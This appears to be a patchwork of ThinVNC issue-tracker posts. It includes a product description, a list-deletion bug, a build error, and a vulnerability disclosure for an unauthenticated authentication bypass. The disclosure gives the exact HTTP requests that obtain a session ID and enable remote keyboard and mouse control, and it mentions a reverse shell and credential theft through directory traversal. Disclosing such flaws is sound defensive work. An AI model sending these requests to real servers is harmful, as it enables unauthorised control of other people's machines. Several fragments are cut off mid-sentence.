ThinVNC is a pure HTML5 & AJAX Remote Desktop implementation. ThinVNC works on any HTML5-compliant web browser. Users can access a remote PC from any computer or mobile OS; no additional plugin or installation will be required on the client side.
If you have a count of e.g. 4 and want to delete index 3 it moves the last entries name to that deleted position, but leaves the object in place.
So the whole list ist corrupted.
ThinVNC version 1.0b1 allows an unauthenticated user to bypass the authentication process via http://thin-vnc:8080/cmd?cmd=connect by obtaining a valid SID without any kind of authentication. It is possible to achieve code execution on the server by sending keyboard or mouse events to the server.
CVSSv3 Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
CVSSv3 Base Score:
10.0
Steps to reproduce
Send a request to the application in order to obtain a valid SID.
GET /cmd?cmd=connect&destAddr=poc&id=0 HTTP/1.1Host: 172.16.28.140:8081Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestReferer: http://172.16.28.140:8081/Cookie: SID=
Obtain the SID from the server response and create a new request in order to validate the SID.
GET /cmd?cmd=start&mouseControl=true&kbdControl=true&quality=85&pixelFormat=0&monitor=0&id=[SID] HTTP/1.1Host: 172.16.28.140:8081Connection: closeAccept-Encoding: gzip, deflateAccept: */*User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:98.0) Gecko/20100101 Firefox/98.0Accept-Language: en-US,en;q=0.5X-Requested-With: XMLHttpRequestReferer: http://172.16.28.140:8081/Cookie: SID=[SID]
Now it is possible to send keystrokes or mouse moves to the server using the validated SID
An exploit can be used to obtain a reverse shell on the server running the ThinVNC application.
An authenticated attacker can compromise the VNC server even password protected. There's a bug in the web client which is vulnerable to directory traversal. Accessing the credentials could compromise the whole VNC server and gives an attacker the terminal access to the remote system.
are not included and required.
There might be other files missing but the build process stops right there so I can tell for sure
[DCC Fatal Error] ThinVnc.Manager.pas(50): F1026 File not found: 'ThinVnc.WebSockets.dcu'